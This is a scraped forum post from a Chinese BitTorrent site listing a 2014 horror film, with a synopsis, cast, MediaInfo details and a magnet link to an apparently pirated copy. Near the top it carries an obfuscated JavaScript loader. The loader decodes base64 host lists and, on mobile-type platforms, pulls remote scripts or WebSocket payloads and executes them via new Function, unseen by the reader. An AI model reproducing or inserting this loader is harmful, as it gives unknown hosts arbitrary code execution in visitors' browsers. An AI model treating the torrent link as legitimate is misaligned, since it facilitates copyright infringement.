食人虫[国语音轨].Shi.Ren.Chong.2014.1080p.HDR.WEB-DL.H265.AAC 1.44GB

版主小s 26天前 290

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x62\x50\x73\x42\x6e\x58\x4f\x42\x73\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXlxa2RmODc5Zi5hc2xleXR5LmNvbbSxodHRwczovL29oamZrN2pmMjguZ3Nqemxzc3dzLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译  名 食人虫 / 3D食人虫 / Bugs
◎年  代 2014
◎产  地 中国大陆
◎类  别 科幻 / 惊悚 / 灾难
◎语  言 汉语普通话 / 英语
◎上映日期 2014-10-10(中国大陆)
◎IMDb链接 https://www.imdb.com/title/tt4228850/
◎豆瓣评分 3.1/10 (4188人评价)
◎豆瓣链接 https://movie.douban.com/subject/25958914/
◎片  长 82分钟
◎导  演 严嘉 Vash Yan (id:1342236)
◎演  员 夏梓桐 Zitong Xia (id:1275936)
       张梓琳 Eilin Zhang (id:1313619)
       王传君 Chuanjun Wang (id:1313837)
       丁春诚 Sphinx Ting (id:1275480)
       李彧 Yu Li (id:1316548)
       修睿 Rui Xiu (id:1326496)
       尤宪超 Xianchao You (id:1317613)
       曹云金 YunJin Cao (id:1318973)
       许还山 Huanshan Xu (id:1313235)
       刘晓光 Kiefer Liu (id:1275626)

◎标  签 恐怖 / 灾难 / 科幻 / 惊悚 / 大陆 / 国产电影 / 2014 / 血腥

◎简  介
  在一个处于热带的沿海城市,正在举行一场盛大的狂欢活动,型男靓女从四面八方云集于此。时尚女孩大秀身材舞姿,富二代们脑满肠肥,猎艳放纵。某时尚杂志摄影师张晨(王传君 饰)和刚刚分手的的女友小菲(夏梓桐 饰)乘机来到当地做采访;张晨的前女友曼青(张梓琳 饰)以嘉宾身份带着爷爷出席盛典,享受阳光沐浴;此外,某个盗贼团伙在老大(曹云金 饰)的率领下伺机行窃。欢声雷动,人头攒动,金色的沙滩上,危机悄然蔓延。                                    
                                就在不久前,大海中央一艘破旧的轮船内,某疯狂科学家研究的奇怪生物突然失控,以惊人的速度迅速蔓延。而今它们跨过重洋,慢慢接近沙滩,型男靓女们即将成为食人虫的猎物……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 179692686602600575839370709455771469201 (0x872F8D76A3865FAFE376D19C3C3F0591)

  4. Complete name                            : 食人虫[email protected]kv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 1.44 GiB

  8. Duration                                 : 1 h 18 min

  9. Overall bit rate                         : 2 613 kb/s

  10. Encoded date                             : UTC 2021-08-07 13:42:40

  11. Writing application                      : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  12. Writing library                          : libebml v1.4.0 + libmatroska v1.6.1


  13. Video

  14. ID                                       : 1

  15. Format                                   : HEVC

  16. Format/Info                              : High Efficiency Video Coding

  17. Format profile                           : Main [email protected]@Main

  18. HDR format                               : SMPTE ST 2086, HDR10 compatible

  19. Codec ID                                 : V_MPEGH/ISO/HEVC

  20. Duration                                 : 1 h 18 min

  21. Bit rate                                 : 2 487 kb/s

  22. Width                                    : 1 920 pixels

  23. Height                                   : 808 pixels

  24. Display aspect ratio                     : 2.40:1

  25. Frame rate mode                          : Constant

  26. Frame rate                               : 25.000 FPS

  27. Color space                              : YUV

  28. Chroma subsampling                       : 4:2:0

  29. Bit depth                                : 10 bits

  30. Bits/(Pixel*Frame)                       : 0.064

  31. Stream size                              : 1.37 GiB (95%)

  32. Default                                  : Yes

  33. Forced                                   : No

  34. Color range                              : Limited

  35. Color primaries                          : BT.2020

  36. Transfer characteristics                 : PQ

  37. Matrix coefficients                      : BT.2020 non-constant

  38. Mastering display color primaries        : R: x=0.708000 y=0.292000, G: x=0.170000 y=0.797000, B: x=0.130000 y=0.046000, White point: x=0.312700 y=0.329000

  39. Mastering display luminance              : min: 0.0000 cd/m2, max: 0 cd/m2


  40. Audio

  41. ID                                       : 2

  42. Format                                   : AAC LC

  43. Format/Info                              : Advanced Audio Codec Low Complexity

  44. Codec ID                                 : A_AAC-2

  45. Duration                                 : 1 h 18 min

  46. Bit rate                                 : 124 kb/s

  47. Channel(s)                               : 2 channels

  48. Channel layout                           : L R

  49. Sampling rate                            : 44.1 kHz

  50. Frame rate                               : 43.066 FPS (1024 SPF)

  51. Compression mode                         : Lossy

  52. Stream size                              : 70.1 MiB (5%)

  53. Language                                 : Chinese

  54. Default                                  : Yes

  55. Forced                                   : No



TAGS 惊悚 科幻 灾难

磁力链:
  • magnet:?xt=urn:btih:394E66E3996092BEBD195A4CFB6C9B56496ED6C6
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回